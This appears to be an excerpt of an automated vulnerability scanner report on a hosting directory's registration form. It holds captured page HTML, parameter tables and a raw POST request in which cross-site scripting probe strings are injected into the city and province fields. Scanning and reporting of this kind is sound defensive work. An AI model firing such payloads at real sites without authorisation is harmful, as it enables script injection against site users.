HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:17:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='76E0188F5F077DBD861283D16AC620B6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='76E0188F5F077DBD6BD9D6AE648EBD286F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='76E0188F5F077DBD49FB77B1E18A73BAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD87A019402FB1DBADC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='76E0188F5F077DBDA9F4A07E74CDA1E06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='76E0188F5F077DBD9BBF7DB490282A16C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='76E0188F5F077DBD6B6AF70CCF240354C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='76E0188F5F077DBD07FB19841CDA103B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='76E0188F5F077DBD07F7589504D5CC81C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='76E0188F5F077DBDEE1C6AC5FBE85C846F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='76E0188F5F077DBDB2215EE02B566BA8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='76E0188F5F077DBDCF7FB1A974B573CDC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='76E0188F5F077DBDAB6F08E11D96523EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBDBDDF8C71435DC998C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='76E0188F5F077DBD9F6B32299F96F8C4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='76E0188F5F077DBD1B565D6B7322A5ACC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='76E0188F5F077DBD3335DED53E26F4056F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='76E0188F5F077DBD7FAB24429ABB85AA6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='76E0188F5F077DBD904FA4CAED95772F6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
'"--></style></script><script>alert(0x001D89)</script>
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 544 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D89)%3c%2fscript%3e&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:17:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='76E0188F5F077DBD79CEE1344E81E014C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='76E0188F5F077DBD3829B56C84DB446F6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='76E0188F5F077DBD88B48DAB7F673DA3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD1DED4319D52C43E1C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='76E0188F5F077DBD3AEB7737981E079E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='76E0188F5F077DBD70EA0A8698940768C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='76E0188F5F077DBDC5174EE31CCB164FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='76E0188F5F077DBD6433DE7B6A438CC06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='76E0188F5F077DBD4074D4240F273FFAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='76E0188F5F077DBD359D60F4959EF4EA6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='76E0188F5F077DBDBF1CA61C835D753DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='76E0188F5F077DBDA3FD3054E6499774C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='76E0188F5F077DBDDF40A8443749054FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD9525D662F64EC9CBC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='76E0188F5F077DBD331E720CDFEB85D8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='76E0188F5F077DBDB19226DB6ADDE145C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='76E0188F5F077DBDD3D3DF567C5CFF016F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='76E0188F5F077DBD38B2D705D5B70C6D6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='76E0188F5F077DBDB0C2EC9A094642A46F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
'"--></style></script><script>alert(0x001D99)</script>
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
